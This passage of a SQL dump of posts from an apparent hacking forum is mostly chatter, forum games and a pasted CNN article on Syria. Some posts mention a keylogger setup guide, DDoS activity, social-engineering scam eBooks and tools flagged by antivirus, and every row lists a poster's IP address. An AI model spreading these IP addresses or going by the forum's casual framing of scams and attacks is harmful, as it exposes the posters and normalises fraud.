points)? And then t3h jok3r or Apathy will reply to the thread with an answer. And then the thread will be closed. If you are going to ask another question, you must make another thread. Also, that example was actually why I suggested this. I didn\'t know what you meant by Cross Posting (+20 points). Anyways. Agree? Disagree? Discuss.', '24.212.197.164', '416597412', '1', '0', '82', '1345959155', '1', '4ca28ef9d24dfee7be72905671ce5067', '0', '1345959155'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1029', '241', '1028', '49', 'RE: [Suggestion] Questions Section', '0', '2', 'Apathy', '1345958410', 'You seem to only want to talk to joker?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '240f95735f7590331ef5686459b09f89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1030', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1345958819', 'Banned for having a lot of spelling mistakes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1fa4ec2c7e0282e7ee54a07817bc6566', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1031', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1345958911', 'Benned for acusing tha admin of haveing mistiakes', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'a12de1de1f14f262830a71effc307e22', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1032', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '2', 'Apathy', '1345958964', 'What type of thing would interest you?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '7090ba6b7e962b34eb42d676952e6b5b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1033', '241', '1029', '49', 'RE: [Suggestion] Questions Section', '0', '82', 'iTzIpod', '1345959189', '[quote=\'Apathy\' pid=\'1029\' dateline=\'1345958410\'] You seem to only want to talk to joker? [/quote] What are you talking about?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '906eff5637c35f537cdb0f1ad8c82e98', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1034', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1345959271', 'Banned for having bad grammar and spelling.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc012c464e73f87d21464f33d60b971a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1035', '242', '0', '34', 'Will Smith Signature Tutorial', '0', '82', 'iTzIpod', '1345959364', '[img]http://i.minus.com/ibrTMUoRfSxOs5.png[/img] Credits: NEFantasy Enjoy! Good luck making it!', '24.212.197.164', '416597412', '1', '0', '82', '1346096176', '1', '01bb15cb7741cc6510adf37eba939941', '0', '1346096176'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1036', '243', '0', '34', 'Black Spiderman Signature Tutorial', '0', '82', 'iTzIpod', '1345959485', '[img]http://i.minus.com/iMoCpXvmdPm0U.png[/img] Credits: NEFantasy Enjoy! Good luck making the signature!', '24.212.197.164', '416597412', '1', '0', '82', '1346096134', '1', 'fee0b3bd11e3d75f8d936b2bc0088e91', '0', '1346096134'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1037', '212', '1032', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1345959678', '[quote=\'Apathy\' pid=\'1032\' dateline=\'1345958964\'] What type of thing would interest you? [/quote] Anything that makes it look professional and HQ and Unique.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eb8b81d7097b87f1211986c5283f900d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1038', '238', '1034', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1345959939', '[quote=\'iTzIpod\' pid=\'1034\' dateline=\'1345959271\'] Banned for having bad grammar and spelling. [/quote] Banned for thinking I care enough about this thread to write properly. :)', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'f72a460a57ff0df758787682a23e0166', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1039', '238', '1038', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1345960114', '[quote=\'Apathy\' pid=\'1038\' dateline=\'1345959939\'] [quote=\'iTzIpod\' pid=\'1034\' dateline=\'1345959271\'] Banned for having bad grammar and spelling. [/quote] Banned for thinking I care enough about this thread to write properly. :) [/quote] Banned for having good grammar and spelling.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c812ba61da66266892e41a0a05f07c46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1040', '238', '1039', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1345960629', '[quote=\'iTzIpod\' pid=\'1039\' dateline=\'1345960114\'] [quote=\'Apathy\' pid=\'1038\' dateline=\'1345959939\'] [quote=\'iTzIpod\' pid=\'1034\' dateline=\'1345959271\'] Banned for having bad grammar and spelling. [/quote] Banned for thinking I care enough about this thread to write properly. :) [/quote] Banned for having good grammar and spelling. [/quote] Banned for having good grammar and spelling.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '2ed554464bf90dbfcd7b7bf4edfa4518', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1041', '244', '0', '33', 'Tips on rating GFX', '0', '82', 'iTzIpod', '1345961374', 'Hey LH, Here are some key points to remember when rating another user\'s GFX work: 1. Choice of color 2. Blending 3. Depth 4. Renders 5. Effects 6. Text Also an overall rating out of 10 would be helpful for the user after giving them your comments.', '24.212.197.164', '416597412', '1', '0', '82', '1345961637', '1', '4fd26fb38738ccf76fc80a1c7093c182', '0', '1345961637'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1052', '244', '1041', '33', 'RE: Tips on rating GFX', '0', '2', 'Apathy', '1345986783', 'Another thing that should be added is be good at graphics before trying to actually do a in depth rating.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '647097da71eface00a38ee8b0bb501d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1044', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '53', 'sirchamp', '1345973716', 'Give credit to the real thread maker: criticallygeek.in/2012/02/how-to-setup-rinlogger-complete-and.html', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '938a9ba307e83501e2d766251773fcf0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1045', '246', '0', '11', 'Safety for Safety\'s sake', '0', '48', 'BurnsH4X', '1345978650', 'so i would like to stay protected online and i currently use hotspotshield (VPN) but the free version is very slow so dose anyone know a free fast vpn service (DDosing might be involved in my activities)', '46.11.104.187', '772499643', '0', '0', '0', '0', '1', '3d69604d6d837c02f484d4df989efc46', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1043', '152', '400', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '53', 'sirchamp', '1345970085', 'No virus. thanks so much for this.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '621c5c226ed7eaa880161514677adcb5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1046', '152', '1043', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345984409', '[quote=\'sirchamp\' pid=\'1043\' dateline=\'1345970085\'] No virus. thanks so much for this. [/quote] You are come come bro ;)', '119.154.5.233', '2006582761', '1', '0', '0', '0', '1', 'ea204ea245192930227f929538e3d771', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1047', '220', '899', '55', 'RE: Windows 7 Ultimate', '0', '112', '??????Z', '1345984626', 'POS.. Piece of shit. :)', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', 'b3d1e17e7f33a7dd066fe95efac3b140', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1179', '247', '1055', '16', 'RE: [Free] [EBook] How to SE Pringles', '0', '112', '??????Z', '1346107133', 'yeah same, directs you to the kellogs page and there is no pringles in the list', '92.22.242.209', '1545007825', '0', '0', '0', '0', '1', 'f134f043468079dbdc55adb3c36a0493', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1049', '113', '286', '15', 'RE: ?Auto Youtube viewer?', '0', '53', 'sirchamp', '1345986012', 'False detection. For instance let me ask you something. Why doesnt Avast detect it?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '8b18684f6e5f535c5c8941af2fda5548', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1050', '25', '71', '19', 'RE: Blackhat System Scanner', '0', '48', 'BurnsH4X', '1345986015', 'y dose avg say its a virus?', '46.11.104.187', '772499643', '0', '0', '0', '0', '1', 'df5452602890a73e532ab76ad5b1647a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1051', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1345986611', 'Banned for having good grammar and spelling.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'b965df065daa95bdbe6ec262c4303028', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1053', '238', '1021', '56', 'RE: Ban the user above you', '0', '67', 'HoverCatz', '1345990823', 'Banned for reason: Red name', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '70b060e42db0dda8faea2700f527be1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1054', '238', '1021', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1345990990', 'Banned everyone else because I am a admin and can actually do it :)', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'a339bc8bb17defbd3d997d747ffb61be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1055', '247', '0', '16', '[Free][EBook] How to SE Pringles', '0', '82', 'iTzIpod', '1345991171', 'Hey LH, Just trying to contribute to the forums. This eBook gives you a technique to SE Pringles. It is guaranteed to work every time. To download: http://adf.ly/DB5VW', '24.212.197.164', '416597412', '1', '0', '82', '1348618147', '1', '7bbaffc7cc8b13818c7bdf0de5e9bc29', '0', '1348618147'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1056', '248', '0', '16', '[Free][EBook] How to SE a 3DS', '0', '82', 'iTzIpod', '1345991325', 'Hey LH, Just trying to contribute to the forums. This eBook will not be guaranteed to work 100%. But it still works if you got the skills. To Download: http://adf.ly/DB5Sh', '24.212.197.164', '416597412', '1', '0', '82', '1348618098', '1', 'c27978ccb089088d45682c58cc3019a2', '0', '1348618098'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1057', '249', '0', '56', 'Last person to reply, wins!', '0', '82', 'iTzIpod', '1345991527', 'Title says it all. Whoever is the last person to reply to this thread, wins!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1a6d25e98c20caa054b3ae31c03b23a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1058', '241', '1028', '49', 'RE: [Suggestion] Questions Section', '0', '20', 'JakeUS', '1345992133', 'You can just ask questions through private messages or the rules and announcements section.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '6e9f77fba645ab5343865680b8ede597', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1059', '240', '1025', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '20', 'JakeUS', '1345992181', 'PM Joker about this.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'e849f06b007cb9388c145e658ac7fa4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1060', '250', '0', '42', 'Saturday is deadliest day in Syrian civil war', '0', '82', 'iTzIpod', '1345994060', 'Before I start, This is a long article. Just click on the Original Link below. And watch the video or read the article. --------------------------------------- (CNN) -- At least 330 people were reported dead Saturday in Syria, marking the highest single-day death toll since the start of the uprising, according to opposition activists. With one week left to go, August is already the deadliest month. Here are some of the other key developments on the crisis that is spiraling out of control: On the ground: Deaths mount as assault intensifies Saturday\'s death toll includes the bodies of more than 200 people that were found in and around Damascus, namely Daraya, according to the Local Coordination Committees of Syria, a network of opposition activists. It was unclear when those victims were killed. Saturday\'s death toll is the highest single-day figure since the start of the uprising, said a spokesman for the group. CNN is unable to independently verify reports of violence as Syria has severely limited access to international journalists. With one week left to go, August is already the deadliest month in Syria\'s 17-month crisis. Opposition activists report more than 3,700 people killed -- mostly civilians -- in just the past few weeks. Prior to Saturday, the single bloodiest day was reported on July 12. At least 287 people were killed then, including 220 in Hama province, according to the LCC. The Syrian military\'s frontal assault on the opposition appears to be ratcheting up, with indiscriminate bombings from jets and rockets fired into civilian areas. More than 10 missiles landed in Idlib province as planes opened fire with machine guns, the LCC said. Meanwhile, residents in Aleppo endured \"intense aerial shelling\" by a regime warplane Saturday, the group said. Photos: Showdown in Syria Alawite voices inside Lebanon Lebanon pulled deep into Syria conflict \'Syria becoming a proxy war\' President Bashar al-Assad\'s government had a different take on the situation in Aleppo, the commercial and cultural heart of Syria. \"Armed forces continue pursuing terrorists in Aleppo and its countryside,\" state-run media proclaimed. \"Armed forces destroy seven cars equipped with machine guns, kill terrorists and seize their weapons in Aleppo city.\" The region: Abducted Lebanese pilgrim freed Hussein Ali Omar, one of 11 Lebanese Shiite pilgrims abducted in Syria, was in Turkey on Saturday after being released, according to a representative for Turkey\'s foreign minister. \"We are trying to get him to his country,\" the representative said. \"We think our efforts may have helped.\" The Free Syrian Army has denied an allegation it was involved in the May abductions. The other 10 pilgrims are still being held. The development follows the kidnapping in Damascus of a Lebanese man, Hassan Salim Meqdad, by Syrian rebels who accused him of being a Hezbollah member. In response, Meqdad\'s brother, Hatem Meqdad, told Lebanon\'s state news agency that his family kidnapped 26 Syrians living in Lebanon. Turkish Foreign Minister Ahmet Davutoglu, meanwhile, rejected claims that his country was shipping weapons to Syrian rebels in their quest to oust al-Assad, the Anadolu news agency reported. \"These are the arguments which authoritarian regimes had always used to conceal their internal problems,\" Davutoglu told the NTV news channel, according to Anadolu. Davutoglu added, \"No regime fighting its own people can survive long. (The al-Assad regime) has months, and maybe even weeks -- not years.\" Diplomatic front: New envoy says Syrian people are \'our first masters\' Lakhdar Brahimi is the new U.N. and Arab League envoy to Syria, but he said the Syrian people will be \"our first masters.\" \"We will consider their interests above and before anyone else,\" the Algerian and longtime U.N. diplomat said Friday. Brahimi, who replaces Kofi Annan after months of fizzled attempts to broker peace in Syria, told U.N. Secretary-General Ban Ki-moon of his anxiety about the new post: \"Secretary-general, when you called me, I told you that I was honored, flattered, humbled and scared, and still in that frame of mind. I will definitely give this my very, very best,\" Brahimi said. The Syrian crisis broke out in March 2011 after protesters, inspired by the success of popular uprisings in Egypt and Tunisia, took to the streets demanding political reform and an end to four decades of al-Assad family rule. The movement devolved into an armed conflict after a brutal crackdown by al-Assad\'s forces. Opposition forces say more than 21,000 people have died. Syria 101: A crash course on the conflict CNN\'s Saad Abedine, Holly Yan and Jim Clancy contributed to this report. Original Link: http://www.cnn.com/2012/08/25/world/meast/syria-civil-war/index.html?hpt=wo_c1', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e98387e0a073d90d433b11706c543eda', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1061', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '53', 'sirchamp', '1345997418', 'So actually with always new members incoming this could go 4ever.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'de972bfeb6a81a80cdce334e868b592f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1062', '208', '788', '7', 'RE: I m feeling happy ;)', '0', '53', 'sirchamp', '1345998440', 'HF is the best hacking forum out there at the moment. And isnt the word phishing also censored?Edit: It isnt censored anymore.', '188.155.56.90', '-1130678182', '1', '0', '53', '1345998468', '1', 'b7097e977d1b103486dd817ffc0645ce', '0', '1345998468'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1063', '251', '0', '19', '[Junk]sig', '0', '127', 'Eucliwood', '1346000124', 'how long is my \'\'edit signature\'\' gona be disabled?', '88.88.71.130', '1482180482', '1', '0', '1', '1346074960', '1', 'f972f5f8ccfa8b98e9c8e17201d30ab4', '0', '1346074960'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1064', '231', '929', '4', 'RE: Sup', '0', '127', 'Eucliwood', '1346000266', 'umm, i dont get how that was taken as \'\'adult content\'\' it\'s a part intro scene from a serie called Deadman Wonderland. what is \'\'adult\'\' in this? she is not naked... [img]http://sadpanda.us/images/1105704-K27WQSV.gif[/img]', '88.88.71.130', '1482180482', '1', '0', '127', '1346000470', '1', 'd3b43e6c0f80334f210b2caaa306e6bf', '0', '1346000470'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1065', '231', '929', '4', 'RE: Sup', '0', '53', 'sirchamp', '1346007054', 'That really scares me :D all the blood.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'c11e12f702fbc03fb5f310bcc2a61f30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1066', '231', '929', '4', 'RE: Sup', '0', '127', 'Eucliwood', '1346008873', 'blood/red smoke, how is even that \'\'adult\'\' ?', '88.88.71.130', '1482180482', '1', '0', '0', '0', '1', 'd876b0c4be968ae3af19dd9c6a1d63ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1067', '251', '1063', '19', 'RE: sig', '0', '67', 'HoverCatz', '1346012999', 'He said 2 days', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'c6522959177bcaddff27f646cdd25e2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1068', '251', '1063', '19', 'RE: sig', '0', '127', 'Eucliwood', '1346013059', '^ no reason...........................', '88.88.71.130', '1482180482', '1', '0', '0', '0', '1', 'e4b0c3e56e7625e124f35411d134975c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1069', '239', '1022', '7', 'RE: 1000th Post', '0', '1', 't3h jok3r', '1346014610', 'I didn\'t even notice. Thanks to everyone who helped LH reach 1K posts.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '4f96edbf63b2e562f80e375cd1e9bb31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1070', '240', '1025', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '1', 't3h jok3r', '1346014775', 'Thanks for the report. I have double checked this and it seems to be working perfectly. Only Staff and the poster can see their own threads. Mods can see it I think, because they are moderating that forum.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'e9b20dde8030f2f38f3aeb7e7b2fa858', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1071', '231', '1064', '4', 'RE: Sup', '0', '1', 't3h jok3r', '1346015256', '[quote=\'Eucliwood\' pid=\'1064\' dateline=\'1346000266\'] umm, i dont get how that was taken as \'\'adult content\'\' it\'s a part intro scene from a serie called Deadman Wonderland. what is \'\'adult\'\' in this? she is not naked... [img]http://sadpanda.us/images/1105704-K27WQSV.gif[/img] [/quote] The nipples are visible and clear. Which is considered adult content. I gave you 20% warning, but since you were new I just removed the signature.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'ce101cf521c6576e9c6905257c9d91f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1072', '251', '1063', '19', 'RE: sig', '0', '1', 't3h jok3r', '1346015292', 'Please have a look at my reply on your welcome thread. http://l33thacking.com/showthread.php?tid=231&pid=1071#pid1071 There\'s just one day left.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', 'caf94ab540b9af971ae97017d2f83402', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1073', '207', '776', '3', 'RE: Suggest awards and apply for awards', '0', '1', 't3h jok3r', '1346015422', 'I honestly don\'t think the trusted award is the best thing to implement, because some people will act decent till they get the award then scam members like shit.', '41.151.135.157', '697796509', '1', '0', '0', '0', '1', '84ada7e82bb9d151a0e451a55acbf4d9', '0', '0'); INSERT 